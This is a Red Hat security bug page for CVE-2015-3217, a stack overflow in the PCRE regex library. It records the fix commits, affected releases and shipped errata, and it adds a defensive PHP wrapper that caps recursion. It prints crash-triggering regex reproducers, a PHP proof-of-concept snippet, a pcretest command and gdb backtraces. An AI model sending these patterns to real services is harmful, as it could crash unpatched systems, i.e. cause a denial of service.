Bug 1228283 - CVE-2015-3217 pcre: stack overflow caused by mishandled group empty match (8.38/11)
Status: NEW
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware/OS: All / Linux
Priority: medium
Severity: medium
Assigned To: Red Hat Product Security
Whiteboard: impact=moderate,public=20150603,repor...
Keywords: Reopened, Security
Depends On: 1330455 1330456 1330508 1330509
Blocks: 1226929 1287727
Reported: 2015-06-04 10:31 EDT by Vasyl Kaigorodov
Modified: 2016-11-23 09:09 EST
Fixed In Version: pcre 8.38
Doc Type: Bug Fix
Last Closed: 2015-07-03 12:35:26 EDT

External Trackers
Tracker ID      | Priority | Status       | Summary                                                          | Last Updated
RHSA-2016:1025  | normal   | SHIPPED_LIVE | Important: pcre security update                                  | 2016-05-11 13:07:01 EDT
RHSA-2016:1132  | normal   | SHIPPED_LIVE | Important: rh-mariadb100-mariadb security update                 | 2016-05-26 08:35:06 EDT
RHSA-2016:2750  | normal   | SHIPPED_LIVE | Moderate: rh-php56 security, bug fix, and enhancement update     | 2016-11-15 11:40:02 EST
(all three are Red Hat Product Errata)

Description Vasyl Kaigorodov 2015-06-04 10:31:28 EDT
Stack buffer overflow was reported in PCRE library.
Original report:
"""
The latest version of PCRE is prone to a stack overflow vulnerability, which can be caused by the following regular expression.

/^(?:(?(1)\\.|([^\\\\W_])?)+)+$/

To reproduce the problem, we can use pcretest, provided by the PCRE library, or applications that wrap PCRE, such as PHP.
For pcretest, simply type the regular expression after the re> prompt.
For PHP, the latest version, PHP 5.6.9 (bundling PCRE 8.37), can be triggered by the following code snippet.

<?php
preg_match("/^(?:(?(1)\\\\.|([^\\\\\\\\W_])?)+)+$/","abcd",$arr);
?>

Other versions and applications may also be affected.

The following test was conducted under Kali Linux (based on Debian x64) with PHP 5.6.9:
==============================================================
(gdb) r poc.php
Program received signal SIGSEGV, Segmentation fault.
0x000000000047294f in match (eptr=0x7ffff7eb7d91 "DLAB",
    ecode=0x10070ad "\035\\\fw", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=4,
    md=0x7fffffffa9a0, eptrb=0x0, rdepth=11130)
    at /root/php-5.6.9/ext/pcre/pcrelib/pcre_exec.c:1439
1439          RMATCH(eptr, ecode, offset_top, md, eptrb, RM49);
(gdb) bt
#0  0x000000000047294f in match (eptr=0x7ffff7eb7d91 "DLAB",
    ecode=0x10070ad "\035\\\fw", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=4,
    md=0x7fffffffa9a0, eptrb=0x0, rdepth=11130)
    at /root/php-5.6.9/ext/pcre/pcrelib/pcre_exec.c:1439
#1  0x000000000047e2ee in match (eptr=0x7ffff7eb7d91 "DLAB",
    ecode=0x10070dd "y", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=4,
    md=<optimized out>, eptrb=0x0, rdepth=11129)
    at /root/php-5.6.9/ext/pcre/pcrelib/pcre_exec.c:2061
#2  0x0000000000472f45 in match (eptr=0x7ffff7eb7d90 "ADLAB",
    ecode=0x10070b4 "\205", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=2,
    md=0x7fffffffa9a0, eptrb=0x7fffff7ffa00, rdepth=11128)
    at /root/php-5.6.9/ext/pcre/pcrelib/pcre_exec.c:983
#3  0x0000000000472e2d in match (eptr=0x7ffff7eb7d90 "ADLAB",
    ecode=0x10070b3 "\222\205", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=2,
    md=0x7fffffffa9a0, eptrb=0x7fffff7ffa00, rdepth=11127)
    at /root/php-5.6.9/ext/pcre/pcrelib/pcre_exec.c:1878
#4  0x0000000000472957 in match (eptr=0x7ffff7eb7d90 "ADLAB",
    ecode=0x10070b3 "\222\205", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=2,
    md=0x7fffffffa9a0, eptrb=0x0, rdepth=11126)
    at /root/php-5.6.9/ext/pcre/pcrelib/pcre_exec.c:1439
#5  0x000000000047e2ee in match (eptr=0x7ffff7eb7d90 "ADLAB",
    ecode=0x10070e0 "y", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=2,
    md=<optimized out>, eptrb=0x0, rdepth=11125)
"""

Upstream bug: https://bugs.exim.org/show_bug.cgi?id=1638
Upstream commits:

    http://vcs.pcre.org/pcre/code/trunk/pcre_compile.c?r1=1560&r2=1562&pathrev=1562
    http://vcs.pcre.org/pcre/code/trunk/pcre_compile.c?r1=1559&r2=1560&pathrev=1562
(I'm not sure which one fixes the issue exactly though)

Steps to reproduce could be found in the flaw description above.
Comment 1 Kurt Seifried 2015-07-03 12:35:26 EDT
Statement:

(none)
Comment 2 Tomas Hoger 2016-02-23 07:06:24 EST
(In reply to Vasyl Kaigorodov from comment #0)
> Upstream commits:
> http://vcs.pcre.org/pcre/code/trunk/pcre_compile.c?r1=1560&r2=1562&pathrev=1562
> http://vcs.pcre.org/pcre/code/trunk/pcre_compile.c?r1=1559&r2=1560&pathrev=1562
> (I'm not sure which one fixes the issue exactly though)

Neither of the above, the upstream fix is:

http://vcs.pcre.org/pcre?view=revision&revision=1566

Confirmed the issue in Red Hat Enterprise Linux 7 (pcre 8.32) and Red Hat Enterprise Linux 6 (pcre 7.8), not reproducible in Red Hat Enterprise Linux 5 (pcre 6.6).

Reproducer, as noted in the upstream bug:

/^(?:(?(1)x|)+)+$()/

Not easily reproducible with the glib2-embedded pcre, as pcre in glib2 is built with MATCH_LIMIT_RECURSION=8192, which limits the number of recursive match() calls.  The issue can be reproduced when using a smaller stack (ulimit -s).
Comment 7 Petr Pisar 2016-04-28 09:09:36 EDT
Please note that a successful reproducer requires non-empty data to match on. E.g.:

$ printf '%s\n%s\n' '/^(?:(?(1)x|)+)+$()/' 'abcd' | libtool --mode=execute valgrind ./pcretest
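Comment 2 notes that a bounded recursion limit (glib2's MATCH_LIMIT_RECURSION=8192) turns this crash into a matcher error, and comment 7 notes the reproducer needs a non-empty subject. The script below, an added example that is not code from the bug report or from PCRE/PHP upstream, puts those two observations together on the PHP side, which is where the original report triggered the bug: it caps pcre.recursion_limit before calling preg_match() and treats a `false` return as an error to be reported, not as "no match". The value 8192 is borrowed from comment 2's glib2 build, the subject 'abcd' comes from the reporter's snippet and comment 7, and the helper names are assumptions of this example. It is written to PHP 5.6 syntax because that is the version on the page.

```php
<?php
/*
 * Added example (not from the bug report or from PCRE/PHP upstream).
 * Runs the comment 2 reproducer through preg_match() with a bounded PCRE
 * recursion limit and reports matcher errors instead of silently treating
 * `false` as a non-match.
 *
 * Assumptions not stated on the page: the 8192 limit is taken from the glib2
 * build mentioned in comment 2; the subject 'abcd' is the reporter's; the
 * helper names pcre_error_name() and safe_preg_match() are ours.
 */

// Bound the number of recursive match() calls pcre_exec() may make.  PHP's
// default (100000) is far more than an 8 MB thread stack holds for this
// pattern: the reporter's backtrace died at rdepth=11130.  The limit only
// helps if limit * frame size fits the stack, so keep ulimit -s in mind.
ini_set('pcre.recursion_limit', '8192');
// Bound backtracking too; runaway patterns should fail fast, not spin.
ini_set('pcre.backtrack_limit', '100000');

/** Map a preg_last_error() code to its constant name (PHP 5.6 set). */
function pcre_error_name($code)
{
    $names = array(
        PREG_NO_ERROR              => 'PREG_NO_ERROR',
        PREG_INTERNAL_ERROR        => 'PREG_INTERNAL_ERROR',
        PREG_BACKTRACK_LIMIT_ERROR => 'PREG_BACKTRACK_LIMIT_ERROR',
        PREG_RECURSION_LIMIT_ERROR => 'PREG_RECURSION_LIMIT_ERROR',
        PREG_BAD_UTF8_ERROR        => 'PREG_BAD_UTF8_ERROR',
        PREG_BAD_UTF8_OFFSET_ERROR => 'PREG_BAD_UTF8_OFFSET_ERROR',
    );
    return isset($names[$code]) ? $names[$code] : "unknown($code)";
}

/**
 * Match $pattern against $subject.  preg_match() returns 1/0 on success and
 * false on a matcher error; callers that only test for truthiness confuse
 * the two.  Returns array('matched' => bool, 'groups' => array) on success
 * or array('error' => string) when the matcher gave up.
 */
function safe_preg_match($pattern, $subject)
{
    $matches = array();
    $rc = preg_match($pattern, $subject, $matches);
    if ($rc === false) {
        return array('error' => pcre_error_name(preg_last_error()));
    }
    return array('matched' => ($rc === 1), 'groups' => $matches);
}

// Comment 2's reproducer; per comment 7 the subject must be non-empty.
// A benign control pattern follows so the normal path is visible too.
$cases = array(
    '/^(?:(?(1)x|)+)+$()/' => 'abcd',
    '/^[a-d]+$/'           => 'abcd',
);

foreach ($cases as $pattern => $subject) {
    $result = safe_preg_match($pattern, $subject);
    if (isset($result['error'])) {
        printf("%-24s -> matcher error: %s\n", $pattern, $result['error']);
    } else {
        printf("%-24s -> %s\n", $pattern, $result['matched'] ? 'match' : 'no match');
    }
}
```

On a build carrying the upstream fix (pcre 8.38, or the errata listed above) the reproducer line simply reports a match result; on a vulnerable build, comment 2's observation is that a recursion limit in this range makes preg_match() return `false` with PREG_RECURSION_LIMIT_ERROR instead of the process dying in match(), provided the thread stack is large enough for that many frames. Either way the point of the wrapper is the `=== false` check: code that writes `if (!preg_match(...))` cannot tell a non-match from a matcher that bailed out.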
Comment 8 errata-xmlrpc 2016-05-11 09:07:15 EDT
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 7

Via RHSA-2016:1025 https://rhn.redhat.com/errata/RHSA-2016-1025.html
Comment 9 errata-xmlrpc 2016-05-26 04:38:24 EDT
This issue has been addressed in the following products:

  Red Hat Software Collections for Red Hat Enterprise Linux 7.1 EUS
  Red Hat Software Collections for Red Hat Enterprise Linux 7.2 EUS
  Red Hat Software Collections for Red Hat Enterprise Linux 7
  Red Hat Software Collections for Red Hat Enterprise Linux 6.6 EUS
  Red Hat Software Collections for Red Hat Enterprise Linux 6
  Red Hat Software Collections for Red Hat Enterprise Linux 6.7 EUS

Via RHSA-2016:1132 https://access.redhat.com/errata/RHSA-2016:1132
Comment 10 errata-xmlrpc 2016-11-15 06:46:41 EST
This issue has been addressed in the following products:

  Red Hat Software Collections for Red Hat Enterprise Linux 6
  Red Hat Software Collections for Red Hat Enterprise Linux 6.7 EUS
  Red Hat Software Collections for Red Hat Enterprise Linux 7
  Red Hat Software Collections for Red Hat Enterprise Linux 7.2 EUS
  Red Hat Software Collections for Red Hat Enterprise Linux 7.3 EUS

Via RHSA-2016:2750 https://rhn.redhat.com/errata/RHSA-2016-2750.html
